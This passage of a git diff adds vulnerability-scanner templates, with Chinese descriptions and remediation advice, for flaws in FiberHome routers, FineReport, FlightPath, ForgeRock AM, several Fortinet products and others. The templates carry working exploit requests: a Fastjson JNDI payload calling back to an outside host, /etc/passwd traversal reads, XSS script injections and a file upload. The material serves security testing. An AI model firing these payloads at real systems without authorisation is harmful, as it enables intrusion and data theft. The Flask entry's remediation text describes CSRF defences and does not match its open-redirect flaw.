环境版本,低于 8u121 7u13 6u141 的用户也请及时升级环境版本,以防受到其他严重漏洞影响。 +requests: +- matchers: + - type: word + part: interactsh_protocol + words: + - dns + - type: word + condition: and + words: + - Bad Request + - "400" + matchers-condition: and + raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "a":{ + "@type":"java.lang.Class", + "val":"com.sun.rowset.JdbcRowSetImpl" + }, + "b":{ + "@type":"com.sun.rowset.JdbcRowSetImpl", + "dataSourceName":"rmi://{{interactsh-url}}/Exploit", + "autoCommit":true + } + } diff --git a/config/51pwn/yaml/FiberHome/CVE-2017-15647.yaml b/config/51pwn/yaml/FiberHome/CVE-2017-15647.yaml new file mode 100755 index 000000000..c65d004d9 --- /dev/null +++ b/config/51pwn/yaml/FiberHome/CVE-2017-15647.yaml @@ -0,0 +1,24 @@ +id: CVE-2017-15647 +info: + name: FiberHome - Directory Traversal + author: + - l0ne1y + description: "FiberHome路由器路径遍历漏洞\n FiberHome routers是中国烽火(FiberHome)公司的一款路由器。\n\nFiberHome路由器中的/cgi-bin/webproc存在目录遍历漏洞。攻击者可利用该漏洞获取路由器上的文件。 " + severity: high + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁. + + + 临时修复方案:
1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。
2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'
3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。
1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。
2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。
3)Apache:修配置文件httpd.conf,把:Options Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。
4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。
4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。 +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth' + method: GET diff --git a/config/51pwn/yaml/FineReport/finereport-path-traversal.yaml b/config/51pwn/yaml/FineReport/finereport-path-traversal.yaml new file mode 100755 index 000000000..dd8857606 --- /dev/null +++ b/config/51pwn/yaml/FineReport/finereport-path-traversal.yaml @@ -0,0 +1,35 @@ +id: finereport-path-traversal +info: + name: FineReport 8.0 Path Traversal + author: + - l0ne1y + tags: + - finereport + - lfi + description: |- + FineReport(帆软)报表系统目录遍历漏洞 + 帆软软件有限公司(以下简称“帆软”)成立于2006年,是中国专业的大数据BI和分析平台提供商,专注商业智能和数据分析领域,致力于为全球企业提供一站式商业智能解决方案。其报表系统FineReport8.0版本存在目录遍历漏洞,攻击者可通过指定路径获取敏感信息。 + reference: + - http://foreversong.cn/archives/1378 + severity: medium + remediation: "**官方修复方案**\n1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://www.fanruan.com/\n1、建议用户到官方获取最新补丁或者最新版本程序:\n\n**临时修复方案**\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n + \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n + \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options + Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 + \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。" +requests: +- matchers: + - type: word + condition: and + part: body + words: + - + - + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml' + - '{{BaseURL}}/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml' + method: GET diff --git a/config/51pwn/yaml/Firewall Analyze/CVE-2012-4889.yaml b/config/51pwn/yaml/Firewall Analyze/CVE-2012-4889.yaml new file mode 100755 index 000000000..f3f89a155 --- /dev/null +++ b/config/51pwn/yaml/Firewall Analyze/CVE-2012-4889.yaml @@ -0,0 +1,29 @@ +id: CVE-2012-4889 +info: + name: ManageEngine Firewall Analyzer 7.2 - Reflected Cross Site Scripting + author: + - l0ne1y + description: "Firewall Analyzer多个跨站脚本漏洞\nFirewall Analyzer中存在多个跨站脚本漏洞,该漏洞源于对用户提供的输入未经过滤。攻击者可利用这些漏洞在受影响站点上下文的不知情用户浏览器上执行任意脚本代码,盗取基于cookie的认证证书进而发起其他攻击。Firewall + Analyzer 7.2版本受到影响,其他版本也可能存在该漏洞。 " + severity: medium + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + http://www.manageengine.com/ + 临时修复方案:
1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + method: GET diff --git a/config/51pwn/yaml/Flask/CVE-2021-32618.yaml b/config/51pwn/yaml/Flask/CVE-2021-32618.yaml new file mode 100755 index 000000000..92fb6ec11 --- /dev/null +++ b/config/51pwn/yaml/Flask/CVE-2021-32618.yaml @@ -0,0 +1,45 @@ +id: CVE-2021-32618 +info: + name: Flask Open Redirect + author: + - 0x_akoko + tags: + - cve + - cve2021 + - redirect + - flask + description: |+ + flask-security_project flask-security 指向未可信站点的url重定向 + flask-security是一个应用软件。快速向Flask应用程序添加安全功能。 + + Flask-Security-Too 存在输入验证错误漏洞,攻击者可以使用合法站点将此类链接发送给不知情的用户,然后将其重定向到他们想要的任何站点。 + + reference: + - /~https://github.com/flask-middleware/flask-security/security/advisories/ghsa-6qmf-fj6m-686c + - /~https://github.com/flask-middleware/flask-security/issues/486 + - https://nvd.nist.gov/vuln/detail/cve-2021-32618 + severity: medium + classification: + cve-id: + - cve-2021-32618 + cwe-id: + - cwe-601 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:/~https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c + + 临时修复方案: + 1、令牌同步模式\n令牌同步模式(英语:Synchronizer token pattern,简称STP)。原理是:当用户发送请求时,服务器端应用将令牌(英语:token,一个保密且唯一的值)嵌入HTML表格,并发送给客户端。客户端提交HTML表格时候,会将令牌发送到服务端,令牌的验证是由服务端实行的。令牌可以通过任何方式生成,只要确保随机性和唯一性(如:使用随机种子【英语:random seed】的哈希链 )。这样确保攻击者发送请求时候,由于没有该令牌则无法通过验证。 + 2、检查Referer字段\nHTTP头中有一个Referer字段,这个字段用以标明请求来源于哪个地址。在处理敏感数据请求时,通常来说,Referer字段应和请求的地址位于同一域名下。以银行操作为例,Referer字段地址通常应该是转账按钮所在的网页地址,应该也位于www.examplebank.com之下。而如果是CSRF攻击传来的请求,Referer字段会是包含恶意网址的地址,不会位于www.examplebank.com之下,这时候服务器就能识别出恶意的访问。这种办法简单易行,工作量低,仅需要在关键访问处增加一步校验。但这种办法也有其局限性,因其完全依赖浏览器发送正确的Referer字段。虽然http协议对此字段的内容有明确的规定,但并无法保证来访的浏览器的具体实现,亦无法保证浏览器没有安全漏洞影响到此字段。并且也存在攻击者攻击某些浏览器,篡改其Referer字段的可能。 + 3、添加校验token\n由于CSRF的本质在于攻击者欺骗用户去访问自己设置的地址,所以如果要求在访问敏感数据请求时,要求用户浏览器提供不保存在cookie中,并且攻击者无法伪造的数据作为校验,那么攻击者就无法再运行CSRF攻击。这种数据通常是窗体中的一个数据项。服务器将其生成并附加在窗体中,其内容是一个伪随机数。当客户端通过窗体提交请求时,这个伪随机数也一并提交上去以供校验。正常的访问时,客户端浏览器能够正确得到并传回这个伪随机数,而通过CSRF传来的欺骗性攻击中,攻击者无从事先得知这个伪随机数的值,服务端就会因为校验token的值为空或者错误,拒绝这个可疑请求。 +requests: +- matchers: + - type: regex + part: header + regex: + - (?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$ + path: + - '{{BaseURL}}/login?next=\\\example.com' + method: GET diff --git a/config/51pwn/yaml/Flatnux/CVE-2012-4878.yaml b/config/51pwn/yaml/Flatnux/CVE-2012-4878.yaml new file mode 100755 index 000000000..08ba92e48 --- /dev/null +++ b/config/51pwn/yaml/Flatnux/CVE-2012-4878.yaml @@ -0,0 +1,24 @@ +id: CVE-2012-4878 +info: + name: FlatnuX CMS - Directory Traversal + author: + - l0ne1y + description: "FlatnuX CMS ‘controlcenter.php’任意文件读取\nFlatnuX CMS 2011 08.09.2版本中的controlcenter.php中存在绝对路径遍历漏洞。远程认证用户可利用该漏洞通过操作中的dir参数中的全路径名,读取任意文件。 " + severity: medium + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁。 + http://www.flatnux.altervista.org/ + + 临时修复方案:
1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。
2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'
3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。
1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。
2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。
3)Apache:修配置文件httpd.conf,把:Options Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。
4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。
4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。 +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open' + method: GET diff --git a/config/51pwn/yaml/FlightPath/CVE-2019-13396.yaml b/config/51pwn/yaml/FlightPath/CVE-2019-13396.yaml new file mode 100755 index 000000000..eda5ddb0d --- /dev/null +++ b/config/51pwn/yaml/FlightPath/CVE-2019-13396.yaml @@ -0,0 +1,61 @@ +id: CVE-2019-13396 +info: + name: FlightPath Local File Inclusion + author: + - 0x_akoko + - daffainfo + tags: + - cve + - cve2019 + - flightpath + - lfi + description: |- + FlightPath 路径遍历漏洞 + FlightPath是一套面向大学的开源学术咨询系统。 + FlightPath 4.x版本和5.0-x版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。 + reference: + - https://www.exploit-db.com/exploits/47121 + - https://www.cvedetails.com/cve/cve-2019-13396/ + - https://nvd.nist.gov/vuln/detail/cve-2019-13396 + - http://getflightpath.com/node/2650 + severity: medium + classification: + cve-id: + - cve-2019-13396 + cwe-id: + - cwe-22 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:http://getflightpath.com/node/2650\n\n临时修复方案:\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n + \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n + \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options + Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 + \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。\n```" +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + extractors: + - name: token + type: regex + regex: + - idden' name='form_token' value='([a-z0-9]+)'> + group: 1 + part: body + internal: true + matchers-condition: and + raw: + - | + GET /login HTTP/1.1 + Host: {{Hostname}} + - | + POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd diff --git a/config/51pwn/yaml/ForgeRock AM/CVE-2021-35464.yaml b/config/51pwn/yaml/ForgeRock AM/CVE-2021-35464.yaml new file mode 100755 index 000000000..d709a796c --- /dev/null +++ b/config/51pwn/yaml/ForgeRock AM/CVE-2021-35464.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-35464 +info: + name: ForgeRock OpenAM <7.0 - Remote Code Execution + author: + - madrobot + description: "ForgeRock AM 任意代码执行 \n ForgeRock AM是一个开源的访问管理、权限控制平台,在大学、社会组织中存在广泛的应用。\n\nForgeRock + AM存在代码问题漏洞,未经身份验证的攻击者可以通过构造特殊的请求远程执行任意代码,并接管运行ForgeRockAM的服务器。 " + severity: high + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://backstage.forgerock.com/knowledge/kb/article/a47894244 + + 临时修复方案:
1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。
2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - 'Set-Cookie: JSESSIONID=' + - type: word + condition: or + part: body + words: + - Version Information - + - openam/ccversion/Masthead.jsp + matchers-condition: and + path: + - '{{BaseURL}}/openam/oauth2/..;/ccversion/Version' + method: GET diff --git a/config/51pwn/yaml/Fortigate SSL VPN/CVE-2015-1880.yaml b/config/51pwn/yaml/Fortigate SSL VPN/CVE-2015-1880.yaml new file mode 100755 index 000000000..ba0b6acfe --- /dev/null +++ b/config/51pwn/yaml/Fortigate SSL VPN/CVE-2015-1880.yaml @@ -0,0 +1,49 @@ +id: CVE-2015-1880 +info: + name: XSS in Fortigates SSL VPN login page + author: + - l0ne1y + tags: + - cve + - cve2015 + - xss + - fortigates + - ssl + description: |- + Fortinet FortiOS sslvpn登录页面跨站脚本漏洞 + Fortinet FortiOS是美国飞塔(Fortinet)公司开发的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSL VPN、Web内容过滤和反垃圾邮件等多种安全功能。 + + Fortinet FortiOS 5.2.3之前5.2.x版本的sslvpn登录页面存在跨站脚本漏洞。远程攻击者可利用该漏洞注入任意Web脚本或HTML。 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2015-1880 + - https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page + - http://www.fortiguard.com/advisory/fg-ir-15-005/ + - http://www.securityfocus.com/bid/74652 + severity: medium + classification: + cve-id: + - cve-2015-1880 + remediation: |- + **官方修复方案** + 目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接: + http://www.fortiguard.com/advisory/FG-IR-15-005/ + + **临时修复方案** + 对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' +requests: +- matchers: + - type: word + part: body + words: + - + - type: status + status: + - 200 + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert(''{{randstr}}'')%3C/script%3E%3C!--&lang=en' + method: GET diff --git a/config/51pwn/yaml/Fortilogger/CVE-2021-3378.yaml b/config/51pwn/yaml/Fortilogger/CVE-2021-3378.yaml new file mode 100755 index 000000000..7e9c28360 --- /dev/null +++ b/config/51pwn/yaml/Fortilogger/CVE-2021-3378.yaml @@ -0,0 +1,82 @@ +id: CVE-2021-3378 +info: + name: FortiLogger 4.4.2.2 - Arbitrary File Upload + author: + - l0ne1y + tags: + - cve + - cve2021 + - fortilogger + - fortigate + - fortinet + description: |- + FortiLogger任意文件上传漏洞 + RZK Fortilogger是土耳其RZK公司的一个可为Windows系统上FortiGate防火墙进行即时状态跟踪,日志记录,搜索/过滤,报告和热点等功能的建站系统。 + + FortiLogger 4.4.2.2 存在安全漏洞,该漏洞源于受任意文件上传的影响。 + reference: + - https://erberkan.github.io/2021/cve-2021-3378/ + - /~https://github.com/erberkan/fortilogger_arbitrary_fileupload + - http://packetstormsecurity.com/files/161601/fortilogger-4.4.2.2-arbitrary-file-upload.html + - http://packetstormsecurity.com/files/161974/fortilogger-arbitrary-file-upload.html + severity: critical + classification: + cve-id: + - cve-2021-3378 + cwe-id: + - cwe-434 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + remediation: |- + **官方修复方案** + 建议用户到官方获取最新补丁或者最新版本程序:https://www.fortilogger.com/ + + **临时修复方案** + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、升级Web Server。 + 10、及时修复Web上传代码。 + 11、不能有本地文件包含漏洞。 + 12、注意0x00截断攻击(PHP更新到最新版本)。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '{{randstr}}' + - type: word + condition: and + part: header + words: + - text/plain + - ASP.NET + matchers-condition: and + raw: + - | + POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS + Accept: application/json + Referer: {{BaseURL}} + Connection: close + X-Requested-With: XMLHttpRequest + + ------WebKitFormBoundarySHHbUsfCoxlX1bpS + Content-Disposition: form-data; name="file"; filename="poc.txt" + Content-Type: image/png + + {{randstr}} + + ------WebKitFormBoundarySHHbUsfCoxlX1bpS + - | + GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1 + Host: {{Hostname}} diff --git a/config/51pwn/yaml/Fortinet FortiMail/CVE-2021-43062.yaml b/config/51pwn/yaml/Fortinet FortiMail/CVE-2021-43062.yaml new file mode 100755 index 000000000..bc043b775 --- /dev/null +++ b/config/51pwn/yaml/Fortinet FortiMail/CVE-2021-43062.yaml @@ -0,0 +1,53 @@ +id: CVE-2021-43062 +info: + name: Fortinet FortiMail 7.0.1 - Reflected Cross-Site Scripting + author: + - l0ne1y + tags: + - cve + - cve2021 + - fortimail + - xss + - fortinet + description: "Fortinet FortiMail 跨站脚本漏洞 \nFortinet FortiMail是美国飞塔(Fortinet)公司的一套电子邮件安全网关产品。该产品提供电子邮件安全防护和数据保护等功能。\n\nFortinet + FortiMail 版本 7.0.1 和 7.0.0、版本 6.4.5 及更低版本、版本 6.3.7 及更低版本、版本 6.0.11 及更低版本存在跨站脚本漏洞,该漏洞源于网页生成期间输入的不正确中和(跨站点脚本)允许攻击者通过对 + FortiGuard URI 保护服务的特制 HTTP GET 请求执行未经授权的代码或命令。" + reference: + - https://nvd.nist.gov/vuln/detail/cve-2021-43062 + - https://www.fortiguard.com/psirt/fg-ir-21-185 + - https://www.exploit-db.com/exploits/50759 + - https://fortiguard.com/advisory/fg-ir-21-185 + severity: medium + classification: + cve-id: + - cve-2021-43062 + cwe-id: + - cwe-79 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://fortiguard.com/advisory/FG-IR-21-185 + + **临时修复方案** + 对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - + - FortiMail Click Protection + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/fmlurlsvc/?=&url=https%3A%2F%2Fbing.com' + method: GET diff --git a/config/51pwn/yaml/Fortinet FortiOS /CVE-2016-3978.yaml b/config/51pwn/yaml/Fortinet FortiOS /CVE-2016-3978.yaml new file mode 100755 index 000000000..9826fdabd --- /dev/null +++ b/config/51pwn/yaml/Fortinet FortiOS /CVE-2016-3978.yaml @@ -0,0 +1,45 @@ +id: CVE-2016-3978 +info: + name: FortiOS (Fortinet) - Open Redirect and XSS + author: + - l0ne1y + tags: + - cve + - cve2016 + - redirect + - fortinet + - fortios + description: |- + Fortinet FortiOS Web User Interface 跨站脚本漏洞 + Fortinet FortiOS是美国飞塔(Fortinet)公司开发的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSL VPN、Web内容过滤和反垃圾邮件等多种安全功能。 + + Fortinet FortiOS的Web User Interface(WebUI)中存在安全漏洞。远程攻击者可借助登录时的‘redirect’参数利用该漏洞将用户重定向到任意Web站点,实施钓鱼攻击或跨站脚本攻击。以下版本受到影响:Fortinet FortiOS 5.0.13之前5.0.x版本,5.2.3之前5.2.x版本,5.4.0之前5.4.x版本。 + reference: + - https://seclists.org/fulldisclosure/2016/mar/68 + - https://nvd.nist.gov/vuln/detail/cve-2016-3978 + - http://seclists.org/fulldisclosure/2016/mar/68 + - http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability + severity: medium + classification: + cve-id: + - cve-2016-3978 + cwe-id: + - cwe-79 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + remediation: |- + **官方修复方案** + 目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接: + https://fortiguard.com/advisory/fortios-open-redirect-vulnerability + + **临时修复方案** + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: regex 